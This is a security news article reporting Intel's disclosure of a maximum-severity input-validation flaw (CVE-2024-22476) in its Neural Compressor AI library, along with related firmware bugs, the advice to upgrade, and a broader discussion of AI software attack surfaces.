Intel Discloses Max Severity Bug in Its AI Model Compression Software

  /     /     /  
Publicated : 23/11/2024   Category : security


Intel Discloses Max Severity Bug in Its AI Model Compression Software


The improper input validation issue in Intel Neural Compressor enables remote attackers to execute arbitrary code on affected systems.



Intel has disclosed a maximum severity vulnerability in some versions of its Intel Neural Compressor software for AI model compression.
The bug, designated as
CVE-2024-22476
, provides an unauthenticated attacker with a way to execute arbitrary code on Intel systems running affected versions of the software. The vulnerability is the most serious among dozens of flaws the company disclosed in a set of
41 security advisories
this week.
Intel identified CVE-2024-22476 as stemming from improper input validation, or a failure to properly
sanitize user input
. The chip maker has given the vulnerability a maximum score of 10 on the CVSS scale because the flaw is remotely exploitable with low complexity and has a high impact on data confidentiality, integrity, and availability. An attacker does not require any special privileges, and neither is user interaction required for an exploit to work.
The vulnerability affects Intel Neural Compressor versions before 2.5.0. Intel has recommended that organizations using the software
upgrade to version 2.5.0 or later
. Intels advisory indicated that the company learned of the vulnerability from an external security researcher or entity whom the company did not identify.
Intel Neural Compressor
is an open source Python library that helps compress and optimize deep learning models for tasks such as computer vision, natural language processing, recommendation systems, and a variety of other use cases. Techniques for compression include neural network pruning — or removing the least important parameters; reducing memory requirements via process call quantization; and distilling a larger model to a smaller one with similar performance. The goal with AI model compression technology is to help enable the deployment of AI applications on diverse hardware devices, including those with limited or constrained computational power, such as mobile devices.
CVE-2024-22476 is actually one of two vulnerabilities in Intels Neural Compressor software that it disclosed — and for which it released a fix — this week. The other is
CVE-2024-21792
, a time-of-check-time-of-use (TOCTOU) flaw that could result in information disclosure. Intel assessed the flaw at presenting only a moderate risk because, among other things, it requires an attacker to already have local, authenticated access to a vulnerable system to exploit it.
In addition to the Neural Compressor flaws, Intel also disclosed five high-severity privilege escalation vulnerabilities in its UEFI firmware for server products. Intels advisory listed all the vulnerabilities (
CVE-2024-22382
;
CVE-2024-23487
;
CVE-2024-24981
;
CVE-2024-23980
; and
CVE-2024-22095
) as input validation flaws, with severity scores ranging from 7.2 to 7.5 on the CVSS scale.
The Neural Compressor vulnerabilities are examples of what security analysts have recently described as the expanding — but often overlooked — attack surface that AI software and tools are creating at enterprise organizations. A lot of the security concerns around AI software so far have centered on the
risks in using large language models
and LLM-enabled chatbots like ChatGPT. Over the past year, researchers have released numerous reports on the susceptibility of these tools to
model manipulation
,
jailbreaking
, and several
other threats
.
What has been somewhat less of a focus so far has been the risk to organizations from vulnerabilities in some of the core software components and infrastructure used in building and supporting AI products and platforms. Researchers from Wiz, for instance, recently found weaknesses in the widely used
HuggingFace platform
that gave attackers a way to tamper with models in the registry or to relatively easily upload weaponized ones to it. A
recent study
commissioned by the UKs Department for Science, Innovation and Technology identified numerous potential cyber-risks to AI technology at every life cycle state from the software design phase through development, deployment, and maintenance. The risks include a failure to do adequate threat modeling and not accounting for secure authentication and authorization in the design phase to code vulnerabilities, insecure data handling, inadequate input validation, and a long list of other issues.

Last News

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Intel Discloses Max Severity Bug in Its AI Model Compression Software